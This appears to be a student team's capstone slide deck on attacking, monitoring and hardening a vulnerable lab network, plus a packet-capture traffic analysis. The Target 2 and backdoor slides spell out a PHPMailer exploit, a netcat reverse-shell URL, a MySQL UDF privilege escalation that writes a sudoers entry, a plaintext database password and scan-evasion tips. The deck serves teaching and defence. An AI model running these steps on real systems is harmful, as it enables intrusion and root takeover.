Final Engagement

Attack, Defense & Analysis of a Vulnerable Network

​

Team Gamma:

Katie Donovan, Spencer Enriquez, Jack Cote, Ramzi Nasnas

1

Table of Contents - Red Team

This document contains the following resources:

Network Topology & Critical Vulnerabilities

Exploits Used

Avoiding Detection

Maintaining Access

2

Network Topology

& Critical Vulnerabilities

​

3

Network Topology

Network

Add Range:192.168.1.0/24

Netmask:.0.0.0.255

Gateway:192.168.1.1�

Virtual Machines:

IPv4:196.168.1.90

OS:Linux

Hostname: Kali

​

IPv4:192.168.1.100

OS: Linux

Hostname: ELK

​

IPv4:192,168.1.105

OS: Linux

Hostname: Capstone

​

IPv4: 192.168.1.110

OS: linux 3.2 - 4.9

Hostname: Target1

​

IPv4: 192.168.1.115

OS Linux 3.2 -4.9

Hostname: Target2

Critical Vulnerabilities: Target 1

Our assessment uncovered the following critical vulnerabilities in Target 1.

​

​

5

Target 1

Critical Vulnerabilities: Target 2

Our assessment uncovered the following critical vulnerabilities in Target 2.

​

​

6

Target 2

Vulnerabilities Details

Backup

​

7

Scannning Target 1 - nmap & wpscan details

8

user names scan

vulnerabilities scan

Target 1

nmap ports and services scan

Scanning Target 2

9

brute forcing usernames scan

ports and services scan

Vulnerabilities scan

Target 2

Exploits Used

​

10

Exploitation Target 1: Weak Password

Summarize the following:

• User michael had a weak password which was easily guessed as the user name: michael.
• With that we had sustained access to the system which allowed us to find the first two flags.

11

Target 1

Exploitation Target 1: MySQL username and pwd in the clear

12

weak password / first point of entry

Target 1

MySQL root password in the clear in php file

which allowed extraction of passwd hashes

un-hash steven’s password with john-the-ripper

With both steven’s and michael’s passwords we were able to extract the first three flags using find commands and other search techniques.

Exploitation Target 1: - python root privilege CVE-2006-0151

13

Target 1

steven can execute python code at root level which allows easy escalation to root privilege

Exploitation Target 2: CVE-2016-10033 (Slide 1)

Also known as: “PHPMailer (5.2.18) remote code execution vulnerability”

14

1. Run a script exploit.sh which abuses phpmailer fields to upload a file called backdoor.php to the web server.

2. Navigate to the backdoor in a web browser and run a simple command to verify it is working as intended:

Target 2

Exploitation Target 2: CVE-2016-10033 (Slide 2)

Also known as: “PHPMailer (5.2.18) remote code execution vulnerability”

15

3. Start a listener on Kali (192.168.1.90), port 4444

4. Return to the backdoor and run the command to grant a reverse shell:

Target 2

Exploitation Target 2: CVE-2016-10033 (Slide 3)

Also known as: “PHPMailer (5.2.18) remote code execution vulnerability”

16

5. Return to Kali (Metasploit). I now have a reverse shell as www-data:

​

6. Upgrade the reverse shell to Meterpreter by running:

ctrl + Z

Yes

sessions -u 1

sessions -i 2

Target 2

Exploitation Target 2: CVE-2016-10033 (Flags 1-3)

Also known as: “PHPMailer (5.2.18) remote code execution vulnerability”

17

Target 2

Capture flags!

Exploitation Target 2: CVE-2016-10033 (Post Exploitation)

Also known as: “PHPMailer (5.2.18) remote code execution vulnerability”

18

6. After gaining the shell as www-data, I looked for ways to escalate to root. I found a script to search for ways to escalate privileges called linuxprivchecker.py. I used Meterpreter to upload this script to the web server, and then executed it within it.

Target 2

Exploitation Target 2: MySQL UDF vulnerability (Slide 1)

Full name: MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)

19

In Kali machine:

• In Kali, download 1518.c from exploit.db.
• I renamed 1518.c to pizza.c
• Compile it: gcc –g –shared –Wl,–soname,pizza.so –o pizza.so pizza.c –lc
• Modify permissions: sudo chmod 777 pizza.so
• Return to Meterpreter session and upload the malware to the web server: Upload pizza.so
• Create shell into the web server: shell

​

In web server as www-data:

1. Move the file to /tmp/: mv pizza.so /tmp/
2. Enter the mysql database: mysql -u root -p wordpress
1. password: R@v3nSecurity

​

reference: https://recipeforroot.com/mysql-to-system-root/

Target 2

Exploitation Target 2: MySQL UDF vulnerability (Slide 2)

Full name: MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)

20

In MySQL database:

1. use mysql;
2. create table foo2(line blob);
3. insert into foo2 values(load_file(‘/tmp/pizza.so’));
4. select * from foo2 into dumpfile ‘/usr/lib/mysql/plugin/pizza.so’;
5. create function do_system returns integer soname ‘pizza.so’;

​

reference: https://recipeforroot.com/mysql-to-system-root/

Target 2

Exploitation Target 2: Improper permissions

Details: mySQL runs as root

21

In MySQL database:

6. At this stage, I have created a user-defined function called do_system. It can execute any command with whatever permissions mysql has. Unfortunately for Raven, mysql has root access. So, I chose to make the function execute the shell command: � echo "www-data ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers �which added me, as www-data, to the sudoers file with no password requirement.

Target 2

Exploitation Target 2: Improper permissions - Flag 4

Details: mySQL runs as root

22

In web server as www-data

• Verify sudoers access, switch to root user, and capture the final flag:

Target 2

Avoiding Detection

​

23

Stealth Exploitation of Target 1 nmap scan detection 1

Monitoring Overview

• Which alerts detect this exploit?
• an nmap scan alert detected this.
• Which metrics do they measure?
• count of access on source. port high in last 5 min
• Which thresholds do they fire at?
• > 2000

Mitigating Detection

• How can you execute the same exploit without triggering the alert?
• we could slow down the scan using: --scan-delay <time> option to adjust delay between probes.
• Image to the right shows no trigger when scan delayed by 0.5s. It took a lot longer to complete the scan
• Are there alternative exploits that may perform better? -D option using decoy IP addresses. However this will only bypass detection for an alert triggered focused on single IP Address.

24

Target 1

Stealth Exploitation of Target 1 nmap url enum detection

Monitoring Overview

• Which alerts detect this exploit?
• HTTP Excessive error codes
• Which metrics do they measure?
• count of http.resposne.status_code
• Which thresholds do they fire at?
• > 400

Mitigating Detection

• How can you execute the same exploit without triggering the alert?
• we could slow down the scan using: --scan-delay <time> option to adjust delay between probes.
• The rest of the graph to the right shows no trigger when scan delayed by 1s. It took a lot longer to complete the scan

25

Target 1

Running a nmap scan to enumerate the URLs on wordpress on target1 using command nmap -script http-enum.nse 192.168.1.110 was detected:

** Jack’s suggestion.

Stealth Exploitation of Target 1 nmap url enum detection

Monitoring Overview

• Which alerts detect this exploit?
• HTTP Request Size Monitor
• Which metrics do they measure?
• sum of http.request.bytes
• Which thresholds do they fire at?
• >3500

Mitigating Detection

• How can you execute the same exploit without triggering the alert?
• we could slow down the scan using: --scan-delay <time> option to adjust delay between probes.
• The rest of the graph to the right shows no trigger when scan delayed.

26

Target 1

Running a nmap scan to enumerate the URLs on wordpress on target1 using command nmap -script http-enum.nse 192.168.1.110 was detected:

** Jack’s suggestion.

Stealth Exploitation of Target 1 hydra scan detection

Monitoring Overview

• Which alerts detect this exploit?
• CPU excess utilization
• Which metrics do they measure?
• max (Peak) CPU utilization %
• Which thresholds do they fire at?
• > 40%

Mitigating Detection

• How can you execute the same exploit without triggering the alert?

27

Target 1

Running a hydra scan to brute force the password on the wordpress login using command below was detected:

Stealth Exploitation of Target 1 hydra scan detection

Monitoring Overview

• Which alerts detect this exploit?
• Excessive HTTP Errors
• Which metrics do they measure?
• total count of http response with code
• Which thresholds do they fire at?
• > 400

Mitigating Detection

• How can you execute the same exploit without triggering the alert?
• I could not find stealth mode for hydra

28

Target 1

Running a hydra scan to brute force the password on the wordpress login using command below was detected:

8086728:

Stealth Exploitation of Target 1 hydra scan detection

Monitoring Overview

• Which alerts detect this exploit?
• CPU excess utilization
• HTTP Request Size Monitor
• Which metrics do they measure?
• max (Peak) CPU utilization %
• Which thresholds do they fire at?
• > 40%

Mitigating Detection

• How can you execute the same exploit without triggering the alert?
• could not find way to make hydra stealth

29

Target 1

Running a hydra scan to brute force the password on the wordpress login using command below was detected:

Stealth Exploitation of Target 1 - other vulnerabilities

​

Monitoring Overview

• Which alerts detect this exploit?
• password guessing as expected did not trigger any alerts.
• It seems doable that we can trigger on ssh login from outside src.ip. did not have time to look into implementing.
• same with python privilege escalation.
• some commercial tools can detect privilege escalation (ObserveIT)

30

Target 1

Stealth Exploitation of Target 2: (PHP mailer vulnerability)

Monitoring Overview

• Which alerts detect this exploit?
• An alert to detect files being uploaded to contact.php
• An alert to detect the reverse shell
• Which metrics do they measure?
• Files uploaded to contact.php
• The tool Falco can detect a reverse shell *
• Which thresholds do they fire at?
• 1 file being uploaded to contact.php
• Falco has a built-in alert to catch reverse shells. It alerts each time a reverse shell is created.

​

Mitigating Detection

• How can you execute the same exploit without triggering the alert?
• To circumvent the file scanning on contact.php, find somewhere else to upload the exploit
• Are there alternative exploits that may perform better?

31

Target 2

* source: https://sysdig.com/blog/reverse-shell-falco-sysdig-secure/

Stealth Exploitation of Target 2: mySQL UDF vulnerability

Monitoring Overview

• Which alerts detect this exploit?
• Alert if any unknown IP address logs into the mysql server
• Alert if system files are modified
• Which metrics do they measure?
• when logging into mysql, source.ip does not equal 192.168.1.115
• changes are made to sudoers, shadow, passwd, etc. (a tool like Falco can alert on this)
• Which thresholds do they fire at?
• 1 login from an unknown ip
• 1 change to an important system file

​

Mitigating Detection

• How can you execute the same exploit without triggering the alert?
• Are there alternative exploits that may perform better?

32

Target 2

Maintaining Access

​

33

Backdooring the Target

Backdoor Overview

• What kind of backdoor did you install (reverse shell, shadow user, etc.)?
• exploit.sh created the backdoor:
• 192.168.1.115/backdoor.php?cmd=
• This backdoor remains open and allows one to execute code as www-data
• How did you drop it (via Metasploit, phishing, etc.)?
• ./exploit.sh
• How do you connect to it?
• in metasploit framework:
• use exploit/multi/handler
• set payload linux/x86/shell/reverse_tcp
• run
• In web browser: 192.168.1.115/backdoor.php?cmd=nc%20192.168.1.90%204444%20-e%20/bin/bash

34

Target 2

Alerts Implemented

​

​

35

HTTP Request Size Monitor

• Metric: http.request.bytes OVER all documents
• Threshold: Above 3500 bytes

​

36

Excessive HTTP Errors

• Metric: top 5 http.response.status_code
• Threshold: ABOVE 400

​

37

CPU Usage Monitor

• Metric: max() OF system.process.cpu.total.pct OVER all documents
• Threshold: ABOVE 0.5

​

38

Port scan alert

• Monitors top 5 source ports
• Fires if there are more than 2000 requests�to one of the top 5 source ports

39

Hardening

​

​

40

Hardening Against Broken Authentication on Target 1

Many of the exploits performed on target one were the results of poor credential strength or storage.

Credential and credential storage strengthening solves the issue

• Creating minimum password requirements
• Never leaving privileged user credentials stored in unencrypted files
• Salting all generated hashes

41

Target 1

Hardening Against Wordpress Enumeration on Target 1

When logging in to a Wordpress website before version 2.8.1 with an incorrect password but correct username a unique error message is displayed. This allows attackers to brute force the username field to enumerate usernames.

Updating Wordpress to a version 2.8.1 or later solves the issue

• $ cd /tmp
• $ wget http://wordpress.org/latest.zip
• $ unzip latest.zip
• $ cd /var/www/html/blog
• $ cp -avr /tmp/wordpress/* .
• $ rm -rf /tmp/wordpress /tmp/latest.zip

​

42

Target 1

Hardening Against sudo Access Control on Target 1

steven’s user account on the web server host possessed sudo rights to the scripting language python. Python is able to perform essentially any task with the right script, making python sudo rights the equivalent to root access.

Proper sudo access controls solves the issue

• Remove sudo access to python
• $ sudo visudo
• Delete the line permitting python sudo privileges
• Save and exit
• Restrict sudo access from any and all scripting languages and compilers
• Restrict sudo access from all commands with known privilege escalation exploits

​

43

Target 1

Hardening Against PHPMailer vulnerability on Target 2

Target 2 has one major vulnerability with its installation of PHPMailer:

CVE-2016-10033 - PHPMailer remote code execution vulnerability

​

To patch this vulnerability, PHPMailer should be updated to a version more recent than 5.2.18.

44

Target 2

Hardening Against mySQL vulnerabilities on Target 2

​

As has been explained, Target 2 has three vulnerabilities with mysql. Here is how to fix them:

1. MySql password in wp-config.php file, and the file is readable by anyone
• Restrict the permissions on this file such that only privileged users may read it
2. MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)
• Update MySQL to a version more recent than 5.0
3. MySQL runs as root.
• Change mysqld to run as a normal unprivileged user
• Instructions: https://dev.mysql.com/doc/refman/8.0/en/changing-mysql-user.html

45

Target 2

Traffic Profile

​

​

​

46

Traffic Profile

Our analysis identified the following characteristics of the traffic on the network:

47

Behavioral Analysis

Purpose of Traffic on the Network

Users were observed engaging in the following kinds of activity.

�“Normal” Activity

• Video Streaming (Youtube)
• News Browsing

​

Suspicious Activity

• Suspicious Endpoint Connections
• Bitorrent Downloads, Copyright Infringement

48

Normal Activity

​

​

​

49

Video Streaming (Youtube)

• Video streaming over https (443) can be seen Wireshark as TLS
• Streaming can be identified by a constant incoming network traffic from the server
• PSH flag: push data to application immediately
• Since traffic was sent over TLS, unable to monitor what was streaming without network key

50

News Browsing

Summarize the following:

​

​

• Between packets 35032-38279, the majority of HTTP requests were directed towards timeinc.com
• When inputting the url into a web browser, it redirects to www.magazine.store, which is a legitimate online magazine website.
• On the site, the user (10.11.11.179) did the following activities:
• Viewed “Libya’s Roman Ruins” photo essay via Time.com
• Downloaded multiple web font files from the site

51

Malicious Activity

​

​

​

52

Suspicious Endpoint Connections

Time Thieves

• HTTP GET found to URI http://205.185.125.104/files/june11.dll
• june11.dll: Known Trojan Horse for remote access
• After successful HTTP GET, TCP connection established with 5.101.51.151 (packets 59677-64031)
• IP located in Saint Petersburg, Russia

53

Suspicious Endpoint Connections (Continued)

Summarize the following:

​

​

• HTTP Post Requests to https://31.7.62.214/fakeurl.htm, throughout packets 31906-32302
• URI located in Zurich, Switzerland
• Form is url encoded, possible infected machine.

54

Illegal Bitorrent Downloads

Summarize the following:

​

​

• HTTP get requests to webpages within http://www.publicdomains.com/, indicating a browsing session
• Packet 69706: GET Betty_Boop_Rthythm_on_the_Reservation
• Though browsing itself is not considered malicious activity, the download request is copyright infringement and considered malicious.

55

The End

​

​

​

​

56

Stealth Exploitation of Target 1 hydra scan detection

• I was also able to detect in Elastisearch the hydra attack by using the filter:

http.request.method : "POST" and http.response.status_code >= 400 and source.ip: 192.168.1.90

57

Target 1

Running a hydra scan to brute force the password on the wordpress login using command below was detected: